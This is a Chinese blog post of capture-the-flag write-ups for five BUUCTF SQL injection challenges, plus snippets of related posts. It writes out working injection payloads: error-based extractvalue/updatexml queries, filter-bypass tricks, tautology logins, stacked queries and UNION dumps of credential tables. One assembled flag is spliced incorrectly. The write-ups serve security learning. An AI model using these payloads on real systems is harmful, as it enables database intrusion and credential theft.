BUUCTF关于sql注入的题目

于 2024-04-19 18:32:25 发布
阅读量667 收藏 12
点赞数 24
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80935968/article/details/137884478
版权

一.极客大挑战 2019]HardSQL

首先,这道题目我通过查看别人的wp,发现过滤了空格,=,substring,mid

  • 使用()代替空格
  • 使用like代替=
  • 使用rightleft代替substringmid

使用万能密码,发现回显报错,但是并没给报错信息

页面无显示位,但有数据库的报错信息,所以判断为报错注入

报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息,

利用updatexml(1,concat(0x7e,database()),2)

concat函数将里面内容连成字符串,与xpath的格式不符,所以会报错

0x7e的axii码为~,updatexml报错信息的内容为特殊字符、字母之后的内容,为了防止查询结果丢失加上特殊字符

注:

爆数据库database()

爆表select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())

爆字段:

select(group_concat(column_name))from(information_schema.columns)where(table_name)like

('表名')

爆内容:

select(group_concat(字段)from(表))

注意爆字段的时候表名需要有单引号,爆内容时不需要加

1.输入1',界面提示报错,根据报错,说明是字符型输入,利用报错信息回显flag

注意这里面过滤了空格,所以需要用()把sql语句圈起来,不能留空格

查询数据库: 

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23

爆表:

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

爆字段:

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

爆数据,把password查出来:

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

~flag{7af70e36-fe1d-4423-9428-a

发现flag只出来了一半,所以使用使用{left(),right()}

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到了另一半flag:~6-fe1d-4423-9428-afbf155de8a8}

拼接到一起:flag{7af70e36-fe1d-4423-9428-a6-fe1d-4423-9428-afbf155de8a8}

二.[极客大挑战 2019]EasySQL1

因为已经确定是sql注入,所以判断它的注入类型

正常查询的回显

输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测

使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句

# 万能公式
1 and 1=1
1' and '1'='1
1 or 1=1
1' or '1'='1

flag{e51c7477-13b6-4abd-a933-58f0136b68c7}

使用  1' or '1'='1    这个万能密码发现直接登录成功,然后得到了flag

为什么 1' and '1' ='1不行?

测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。

# payload
SELECT * FROM tables WHERE username='1' or '1'='1' and password='1' or '1'='1'
# 优先级排序:and 优先级高于 or,所以要计算 and 然后再计算 or
username='1'--->false
'1'='1'---> true
passwrod='1'--->false
'1'='1'--->true
false or (true and false) or true
false or false or true
false or true
#得出结果:true

照这种方法就可以推算出不同的解法

# payload1
# 用户名:1' and '1'='1
# 密码:1' or '1'='1

# payload2
# 用户名:1' and '1'='2
# 密码:1' or '1'='1

# 本质上都是利用 and 和 or 的优先级进行判断,只要返回 TRUE 就没问题

三.[SUCTF 2019]EasySQL1

输入数字1,发现有回显

输入字母a,发现没有回显(输入0同样没有回显)

通过查看其他大佬的wp,发现这道题目要用到堆叠注入

使用Sql堆叠注入查看信息,先用show指令查看数据库:

1;show databases;

再查看一下表:

1;show tables;

 看到Flag表,猜测flag应该在Flag中。

但是用1;show columns from Flag;无法回显出flag只会回显Nonono.  -->说明flag被过滤掉了

(注:1;show columns from用来查询表中列名称)

接下来回顾一下最开始我们输入的非0数字和0与字母所回显的内容:非0数字回显1,0和字母不会回显任何内容

    先了解一下||操作符:在MySQL中,操作符||表示“或”逻辑:

    command1 || command2
    c1和c2其中一侧为1则取1,否则取0

 这里猜测后端语句,因为只有当我们输入非零数字时才会会显出1,而0和其他全都无回显,而猜测逻辑大致是这样的:大胆猜测后端(内部查询语句)语句中有||操作符,只有我们输入非零数字才会满足||的逻辑为True从而进行回显的条件。也就是满足:select 输入的内容 ||  一个列名 from 表名。(select 输入数据 || flag from Flag)

    注:select语句用于从数据库中选取数据,返回的数据会储存在结果表中。

所以接下来搞清楚逻辑后,我们了解一下mssql中的||操作符意义:

    mssql中||表示连接操作符,不表示或的逻辑。

从这里可以找到解题方法:既然我们要找到flag,后端又存在“或” 的逻辑,那么只需要把||或的逻辑改成连接符的作用就可以了。

    这里需要借用到:设置 sql_mode=PIPES_AS_CONCAT来转换操作符的作用。(sql_mode设置)

 利用PIPES_AS_CONCAT令||起到连接符的作用。

构建payload:

    1;set sql_mode=PIPES_AS_CONCAT;select 1

    注:这里的逻辑是先把||转换为连接操作符,注意分号隔断了前面的命令,所以要再次添加select来进行查询,这里把1换成其他非零数字也一样会回显flag

由此回显出flag

四.[极客大挑战 2019]LoveSQL1

注入的流程:

1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
5.爆数据库
6.爆数据库的表
7.爆出表的列
8.爆出flag

1.判断注入点

使用万能账号进行判断,payload如下

  • 账号输入a' or true -- a
  • 密码随便输入 111

发现回显中给了我们密码,登录一下试一试,发现回显和上图一样

2.爆字段

check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1

爆前三个均回显正常,但是爆到第四个时报错

说明有3个字段

3.查看回显位

/check.php?username=1' union select 1,2,3%23&password=1

发现回显点位在2,3

4.爆数据库

check.php?username=1' union select 1,database(),version()%23&password=1

数据库名:geek
版本:10.3.18-MariaDB

5.爆表名

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

数据库表名有:
geekuser
l0ve1ysq1
根据题目,表名应该就是l0ve1ysq1

6.爆表中的列

/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'
%23&password=1

7.爆flag

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

换一个
l0ve1ysq1表

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1

查看网页的源代码

发现了flag

五.[极客大挑战 2019]BabySQL1

根据前两题的经验,我们先用万能密码试一试

/check.php
?username=admin' or '1'='1
&password=1

登陆失败,尝试注释掉password的内容:

/check.php
?username=admin' %23

登陆成功,接下来尝试查询字段数:

/check.php
?username=admin' order by 3%23
&password=1

根据报错信息,可以判断出屏蔽掉了关键字:or,所以万能密码登陆失败,尝试双写绕过:

/check.php
?username=admin' oorr '1'='1%23
&password=1

因为存在将关键字置换为空的过滤,全部双写以绕过,查询字段数:

/check.php
?username=admin' uniunionon selselectect 1,2,3,4 %23
&password=1

判断出字段数为3,查询回显点位:

/check.php
?username=1' uniunionon selselectect 11,22,33 %23
&password=1

得到回显点位为23,查询当前数据库名及版本:

/check.php
?username=1' uniunionon selselectect 11,version(),database() %23
&password=1

得到数据库名为:geek,继续查询当数据库中表名:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23
&password=1

得到两个表名为:b4bsql和geekuser,查询第一个表中的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' %23
&password=1

得到该表中的字段信息,查询username和password的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,username,passwoorrd)) frfromom geek.b4bsql %23
&password=1

发现得到的信息只露出来一半,查看网页的源代码,找到flag

发现了flag:

flag{80026d3e-02bd-4d69-997e-634ea48d0e11}
张张@2005
关注
  • 24
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
关于一个SQL注入题目的思考
12-14
p牛在群里面出了一个好玩的题目,正好晚上空虚寂寞冷,做一下暖暖身子,题目是: <?php $link = mysqli_connect('localhost', 'root', 'root'); mysqli_select_db($link, 'code'); $table = addslashes($_...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1899
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
[极客大挑战 2019]HardSQL 1
bring_coco的博客
09-23 5068
报错注入有两个函数,这里我们使用updatexml(a,b,c),此函数a,c必须为String类型,因此可以使a,c不为String型进行报错。得到id,username,password继续查询值。双写也被过滤掉了,同时空格,=,union也被过滤了。新知识:查不全时可用left(),right()经过一番查询知道right()查询后面部分。[极客大挑战 2019]HardSQL。1.尝试输入数字或字母,都显示以下结果。发现flag并没有完全显示。两种方式都显示一样字样。4.我们尝试报错注入。
非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 1111
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
[极客大挑战 2019]HardSQL1
whale_waves的博客
11-06 257
提示(最后有我自用的字典, 需要可以自取)拿到题目以后直接fuzz这里发现过滤了 '=' '空格以及空格的变式/**/' 'union' 但是updatexml还在还可以使用报错注入, 空格可以用()代替, 而=则可以用like代替payload:这里爆出表名H4rDsq1payload:出了字段, 现在查密码payload:到这里只显示了一半的flag接下来有两个函数可以使用right和substr首先right。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
[极客大挑战 2019]HardSQL1 解题思路
xiyuanyue的博客
10-13 176
flag{d23142e7-2546-47c3-b238-de只返回一部分flag是因为updatexml 函数返回错误信息长度是112个字符,所以要对password 截取一部分,可以通过,substr left right函数做处理 ,substr函数已经禁止,就用right函数。2、尝试联合注入、时间盲注 发现 and union /**/ /*!2、关键字替换(空格替换,单引号替换,等号替换);3、通过错误函数updatexml 获取数据库、表、字段。3、错误函数、时间盲注、条件盲注。
[极客大挑战 2019]HardSQL 1(报错注入)
aaum556的博客
07-16 118
得到一半的flag:flag{62f71bc2-4189-48c7-a2c2-8b。order by查字段,union,堆叠注入,和输入数字都烦返回错误。输入1’,出错,1’#显示不同,存在单引号闭合注入。得到 id,username,password字段。得到后面缺少的flag为:322f9778f3}。mid被过滤了,right可以使用。=,空格,和好多关键字都被过滤了。空格用()绕过,=用like绕过。注:0x7e 是~符号的十六进制。空格被过滤,用()绕过,因此构造。
BUUCTF Writeup-Web-[极客大挑战 2019]HardSQL 1
菜鸟之路
07-17 3516
BUUCTF WriteUp Web [极客大挑战 2019]HardSQL 1 打开后提示sql注入,查看页面源代码: 发现是get两个参数username和password到check.php 因此可以直接用hackbar构造……/check.php?username=aaa&password=aaa,并执行就可以了。用burpsuite直接改数据也行。 然后开始注入,尝试加’、" 发现单引号有报错,双引号没有,没提示有括号,所以应该是普通单引号闭合的字符型注入点 出现这行字说明输入的被过
BUUCTF闯关日记--[极客大挑战 2019]HardSQL1
qq_64201116的博客
05-17 434
以后遇到sql注入,我觉得应该先判断他过滤了什么东西,比如比较重要的 第一个:空格 第二个:and,or,select,#,--+ 第三个:'(单引号)和"(双引号) 第四个:注入使用的函数(可以挑你比较喜欢的顺手的或者简单的函数优先): sleep,if(布尔盲注) updatexml,concat(报错注入) order by,union(显错注入) load_file(DNS注入) 当然了还有一些database()等等,把你要走的路先测试一遍再进行渗透 否则你走到最
报错注入 [极客大挑战 2019]HardSQL1
最新发布
m0_75178803的博客
11-21 794
而第二个参数xpath_string(xpath格式的字符串),我们在注入的时候把第二个参数变为非xpath格式自然会报错。或者1'^(updatexml(1,concat(0x7e,database(),0x7e),1))#①or是或运算,A or B的结果:当A、B中只要有一个或者两个都为1时,结果为1,否则为0;②xor是异或运算,A xor B的结果:当A、B两个不同时结果为1,否则为0。因为我们在上面的尝试中发现and,union,空格是被过滤的。输入1' and 1=2 #
BUUCTF SQL注入1
03-29
这是一道基础的 SQL 注入题目,我们需要在登录页面中注入 SQL 语句来绕过验证,成功登录管理员账号。 首先,我们打开登录页面,输入任意用户名和密码,点击登录,可以看到页面返回了一段 SQL 语句: ``` SELECT * FROM users WHERE username = 'xxx' AND password = 'xxx' ``` 这是一个用于登录验证的 SQL 语句,我们可以通过注入来绕过这个验证。 在用户名和密码处尝试注入,输入 `' or 1=1 --`,点击登录,发现页面跳转到了管理员界面,注入成功。 这个注入语句中,`'` 表示闭合了用户名或密码的字符串,`or 1=1` 表示逻辑或,永远为真,`--` 表示 SQL 注释,注释后面的语句。 因此,注入后的 SQL 语句变为: ``` SELECT * FROM users WHERE username = '' or 1=1 --' AND password = '' or 1=1 --' ``` 其中,`--` 后面的语句被注释掉了,因此不会影响 SQL 语句的执行。 最后,我们成功登录了管理员账号,Flag 就在管理员界面上。 注意,这里的注入语句是基于题目情况而定的,实际情况可能会有所不同,需要结合实际情况来进行注入。同时,注入操作可能会对系统造成损害,需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值